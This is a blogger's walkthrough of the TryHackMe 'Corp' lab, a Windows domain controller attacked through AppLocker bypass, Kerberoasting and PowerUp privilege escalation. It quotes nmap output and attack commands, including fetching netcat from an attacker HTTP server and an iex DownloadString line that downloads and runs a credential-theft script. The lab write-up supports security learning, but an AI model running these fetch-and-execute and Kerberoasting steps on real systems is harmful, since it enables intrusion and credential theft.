TryHackMe Corp Writeup – Bypassing Windows Server 2019 Applocker and Kerberoasting

Hello and welcome back my TryHackMe writeup. So, I have a new task assigned for myself today to compromise a Windows machine in the TryHackMe lab. The machine called “Corp” a Windows Server 2019 Datacenter Edition.

Basically the machine is Subscriber only machine. The best part of subscribing THM is in some challenges you will get to have access to the real life virtual machine you can either RDP it or access it through your favorite web browser. However, I always prefer to RDP directly from my Windows laptop on such machine because of the stability.

The Real Task

The task is to bypass the Windows Applocker and escalate privilege. So, by end of the exploit one will learn about basics of kerberoasting, evading antivirus detection, bypassing applocker and escalating privileges on a Windows server.

Let us start.

Lets us make a nmap scan first

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-14 12:41 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Initiating Ping Scan at 12:41
Scanning 52.17.118.122 [4 ports]
Completed Ping Scan at 12:41, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:41
Completed Parallel DNS resolution of 1 host. at 12:41, 5.52s elapsed
Initiating SYN Stealth Scan at 12:41
Scanning ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (52.17.118.122) [1000 ports]
Discovered open port 2000/tcp on 52.17.118.122
Discovered open port 139/tcp on 52.17.118.122
Discovered open port 135/tcp on 52.17.118.122
Discovered open port 53/tcp on 52.17.118.122
Discovered open port 3389/tcp on 52.17.118.122
Discovered open port 445/tcp on 52.17.118.122
Discovered open port 636/tcp on 52.17.118.122
Discovered open port 3268/tcp on 52.17.118.122
Discovered open port 593/tcp on 52.17.118.122
Discovered open port 5060/tcp on 52.17.118.122
Discovered open port 3269/tcp on 52.17.118.122
Discovered open port 464/tcp on 52.17.118.122
Discovered open port 389/tcp on 52.17.118.122
Completed SYN Stealth Scan at 12:42, 36.12s elapsed (1000 total ports)
Initiating Service scan at 12:42
Scanning 13 services on ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (52.17.118.122)
Completed Service scan at 12:44, 161.31s elapsed (13 services on 1 host)
Initiating OS detection (try #1) against ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (52.17.118.122)
Retrying OS detection (try #2) against ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (52.17.118.122)
Initiating Traceroute at 12:44
Completed Traceroute at 12:44, 0.02s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:44
Completed Parallel DNS resolution of 2 hosts. at 12:44, 0.13s elapsed
NSE: Script scanning 52.17.118.122.
Initiating NSE at 12:44
Completed NSE at 12:45, 44.70s elapsed
Initiating NSE at 12:45
Completed NSE at 12:47, 121.02s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Nmap scan report for ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (52.17.118.122)
Host is up (0.024s latency).
Not shown: 986 filtered ports
PORT     STATE  SERVICE       VERSION
53/tcp   open   domain?
113/tcp  closed ident
135/tcp  open   msrpc         Microsoft Windows RPC
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: corp.local0., Site: Default-First-Site-Name)
445/tcp  open   microsoft-ds?
464/tcp  open   kpasswd5?
593/tcp  open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open   tcpwrapped
2000/tcp open   cisco-sccp?
3268/tcp open   ldap          Microsoft Windows Active Directory LDAP (Domain: corp.local0., Site: Default-First-Site-Name)
3269/tcp open   tcpwrapped
3389/tcp open   ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: OMEGA
|   DNS_Domain_Name: corp.local
|   DNS_Computer_Name: omega.corp.local
|   DNS_Tree_Name: corp.local
|   Product_Version: 10.0.17763
|_  System_Time: 2020-05-14T09:44:49+00:00
| ssl-cert: Subject: commonName=omega.corp.local
| Issuer: commonName=omega.corp.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-13T08:30:43
| Not valid after:  2020-11-12T08:30:43
| MD5:   d5c2 a37d 4171 365c 17af 2d4c a108 3285
|_SHA-1: fa74 2b64 e46e f599 ac78 63da bc40 d054 669c 2b9b
|_ssl-date: 2020-05-14T09:45:33+00:00; 0s from scanner time.
5060/tcp open   sip?
Device type: bridge|general purpose
Running (JUST GUESSING): Oracle Virtualbox (97%), QEMU (94%)
OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu
Aggressive OS guesses: Oracle Virtualbox (97%), QEMU user mode network gateway (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=20 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: OMEGA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-05-14T09:44:51
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   1.43 ms 10.0.2.2
2   1.66 ms ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (52.17.118.122)

NSE: Script Post-scanning.
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 377.06 seconds
           Raw packets sent: 3044 (136.980KB) | Rcvd: 258 (12.231KB)

Ok, a few good number of ports are open, I will consider the rest ports later and try to RDP the machine first. I used my windows RDP to connect and test and then used XFreeRDP in my Kali for easy access to file share.

TryHackMe Corp Writeup – Bypassing Windows Server 2019 Applocker

[Task 2] Bypassing Applocker

The Applocker is application whitelisting technology introduced since Windows 7. It allows restricting which programs users can execute based on the application’s path, publisher and associated hash.

How To Bypass an Applocker

There are many ways to bypass AppLocker. If the AppLocker is configured using the default AppLocker rules, we can bypass it by placing an executable in the application directory. The C:\Windows\System32\spool\drivers\color – is the one mostly being compromised because this is whitelisted by default.

The other ways are discussed here:

And there is a full repo in GitHub called “Ultimate AppLocker ByPass List” that has a list of different possible ways of bypassing techniques.

But in this challenge I’m going to use the location C:\Windows\System32\spool\drivers\color where I move my netcat.exe and run programs from that location, because anything run from that location being ignored or passed through.

I host a Python SimpleHTTPServer and manually copied the nc.exe to the path, but I’ve been blocked by Internet Explorer security settings.

Using PowerShell to import exe

I used the PowerShell Invoke-WebRequest to import the file from my local Python HTTPServer

Command:

Invoke-WebRequest http://10.11.xxx.xxx:8888/nc.exe -OutFile C:\Users\dark\Desktop\nc.exe

So to make sure my netcat is running, I simply run it and called the help and it is confirmed working.

The Task 2-1 is done.

Task 2-2 – Obtaining The Flag from the ConsoleHost_history

As other OS consoles, PowerShell as well stores the history of Console in the file called ConsoleHost_history.txt in %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt location. I need to obtain the first flag from that location.

Command:

And here is the flag:

[Task 3] Kerberoasting

The task 3 is being Kerberoasting. I’m supposed to do use a PowerShell script to request a service ticket for an account and acquire the ticket hash. Then, I will need to crack the hash and get access to another user account!

First, I will need to extract and find all accounts in the Service Principal Name (SPN), for this I will use the PowerShell command:

setspn -T medin -Q ​ */*

The script will run for a couple of seconds and returns with the SPN accounts in the server.

PS C:\Windows\System32\spool\drivers\color> setspn -T medin -Q */*
Ldap Error(0x51 -- Server Down): ldap_connect
Failed to retrieve DN for domain "medin" : 0x00000051
Warning: No valid targets specified, reverting to current domain.
CN=OMEGA,OU=Domain Controllers,DC=corp,DC=local
        Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/omega.corp.local
        ldap/omega.corp.local/ForestDnsZones.corp.local
        ldap/omega.corp.local/DomainDnsZones.corp.local
        TERMSRV/OMEGA
        TERMSRV/omega.corp.local
        DNS/omega.corp.local
        GC/omega.corp.local/corp.local
        RestrictedKrbHost/omega.corp.local
        RestrictedKrbHost/OMEGA
        RPC/7c4e4bec-1a37-4379-955f-a0475cd78a5d._msdcs.corp.local
        HOST/OMEGA/CORP
        HOST/omega.corp.local/CORP
        HOST/OMEGA
        HOST/omega.corp.local
        HOST/omega.corp.local/corp.local
        E3514235-4B06-11D1-AB04-00C04FC2DCD2/7c4e4bec-1a37-4379-955f-a0475cd78a5d/corp.local
        ldap/OMEGA/CORP
        ldap/7c4e4bec-1a37-4379-955f-a0475cd78a5d._msdcs.corp.local
        ldap/omega.corp.local/CORP
        ldap/OMEGA
        ldap/omega.corp.local
        ldap/omega.corp.local/corp.local
CN=krbtgt,CN=Users,DC=corp,DC=local
        kadmin/changepw
CN=fela,CN=Users,DC=corp,DC=local
        HTTP/fela
        HOST/fela@corp.local
        HTTP/fela@corp.local

Existing SPN found!
PS C:\Windows\System32\spool\drivers\color>

I found an existing Service Account for the user called “fela”

Getting Hash From Service Principal Name Account

As we all know, Invoke-Kerberoast.ps1 is one of the commonly used PowerShell script to get HASH from the compromised SPN account. Since the target machine is already connected to the internet I download the script from GitHub CDN.

iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')

Once downloaded, I run the command Invoke-Command and output the hash in hashcat format so that its easy fir me to crack it.

Cracking The hash

I used John to crack the hash using a very simple command and rockyou as wordfile.

Once I have the password, I logged-off the RDP from current user Dark and Logged-in as new user Fela. The falg #2 was found in the desktop of the user Fela.

Privilege Escalation To Administrator

Now I have the user Fela compromised I will look for more and see if I can potentially escalate my privilege as Administrator. For this, I’m going to use PowerShellMafia’s PowerSploit. PowerUp normally look for common Windows privilege escalation vectors that rely on misconfigurations. You will find more usage examples and guide on author’s blog.

Firs, I need to import the PowerShell script directly in to the server from GitHub repo and run Invoke-AllChecks to see if I could find any vulnarabilities.

The script found a couple of vulns, let us run Unattended Path exploit. Unattended Setup is the method by which original equipment manufacturers (OEMs), corporations, and other users install Windows NT in unattended mode, where the Administrator password is stored in Base64 encoded format.

Logging As Administrator

I had an issue accessing the Administrator, I wasn’t able to login using XFreeRDP, it was giving LoginFailure error. I tried a couple of times and tried to log in from my Windows RDP, noticed that the password was expired. Windows was prompting me to change the password, but some reason, I couldn’t change it.

Whatever the error, I should get the FLAG, so I re logged-in back thinking to try the DLL exploit found in the PowerSploit enum. But I found a shortcut to read flag from the Administrator’s desktop from the user Fela. C:/Users/Administrator/Desktop/flag.txt. I don’t know if it was allowed intentionally or wrong access rights.

[UPDATE] – I managed to talk to Paradox over Discord and it was an unintended way I owned the last flag, a small issue and has been fixed already I believe.

Thank you for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.